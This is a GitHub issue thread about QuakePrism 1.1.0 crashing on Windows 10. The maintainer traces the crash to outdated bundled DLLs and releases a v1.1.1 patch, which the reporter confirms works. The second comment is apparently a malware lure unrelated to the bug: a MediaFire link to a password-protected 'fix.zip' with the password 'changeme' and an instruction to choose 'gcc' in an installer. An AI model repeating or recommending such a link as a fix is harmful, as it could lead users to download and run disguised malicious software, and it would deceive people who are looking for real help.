### ISSUE TITLE
Crash on boot in QuakePrism 1.1.0 on Windows 10

### ISSUE THREAD

**Issue by patrickmcurry** [BanceDev/QuakePrism#16]
When I try to boot up QuakePrism 1.1.0 on my computer, I get the following error and the app does not start up or do anything after I click "OK".

![quake-prism-1 1 0-error-2024-08-28](https://github.com/user-attachments/assets/df676ff2-d119-4cce-a8ba-af961c9ccd90)

QuakePrism 1.0.0 runs fine on the same computer.

**Comment by Vomgnar** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lancebord** [comment]
Can you confirm that you have all of the dlls shown here. My first impression was that I just didn't package a dll in the newest version but from my end it looks like the dlls being sent out in the release are the same between versions.
![image](https://github.com/user-attachments/assets/15808f01-47cb-4c95-91cf-fd2a87730d7a)

**Comment by lancebord** [comment]
Nevermind, I have been able to confirm that the dlls being shipped are outdated. I'll be putting out a patch here soon. Thank you for the report.

**Comment by lancebord** [comment]
@patrickmcurry resolved your issue in this patch to my knowledge. I tested on a windows 11 machine though so if you have further issues let me now. For now I'm going to close this issue.

Patch release: https://github.com/BanceDev/QuakePrism/releases/tag/v1.1.1

**Comment by patrickmcurry** [comment]
I’ll give it a try!

**Comment by patrickmcurry** [comment]
Yep Quake Prism 1.1.1 now boots up and runs fine on my Windows 10 machine. GG
